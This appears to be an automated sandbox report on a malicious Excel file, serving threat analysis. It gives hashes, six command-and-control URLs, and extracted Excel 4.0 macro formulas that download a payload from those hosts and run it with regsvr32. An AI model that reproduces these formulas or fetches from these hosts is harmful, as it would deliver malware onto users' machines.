General

  • Target

    f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30

  • Size

    38KB

  • MD5

    6d1f1c5f427c72400803be74c7f0d5ad

  • SHA1

    3157d59b9b5949dd60b81a9d1a6592813e0793ec

  • SHA256

    f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30

  • SHA512

    fe31150d4435911a71e902fedea98d72551fd60ce329b675f4c5751453885704aba16b7ecccbc4c13140905f3cd3e82a595ae011c2e5cce5ec1a4716ee074d26

  • SSDEEP

    768:nC/4614X7FEFu16j7hnyuYC+D5ozu2twUYkcABKM1+bB5lqHLAWUb5Gi:C/46qJEMUhS12twBjgUKS5Gi

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/

http://totalplaytuxtla.com/sitio/tEMOwWRh/

http://meca-global.com/wp-admin/zpM6L8KXY0H/

http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/

http://51.222.72.232/wp-includes/3ztqctcYr/

http://51.222.72.233/wp-includes/Xi60QX9khe/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/","..\xda.ocx",0,0) =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/tEMOwWRh/","..\xda.ocx",0,0)) =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/wp-admin/zpM6L8KXY0H/","..\xda.ocx",0,0)) =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/","..\xda.ocx",0,0)) =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.232/wp-includes/3ztqctcYr/","..\xda.ocx",0,0)) =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.233/wp-includes/Xi60QX9khe/","..\xda.ocx",0,0)) =IF('EFEGVE'!F22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx") =RETURN()

Signatures

Files

  • f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30
    .xlsx office2007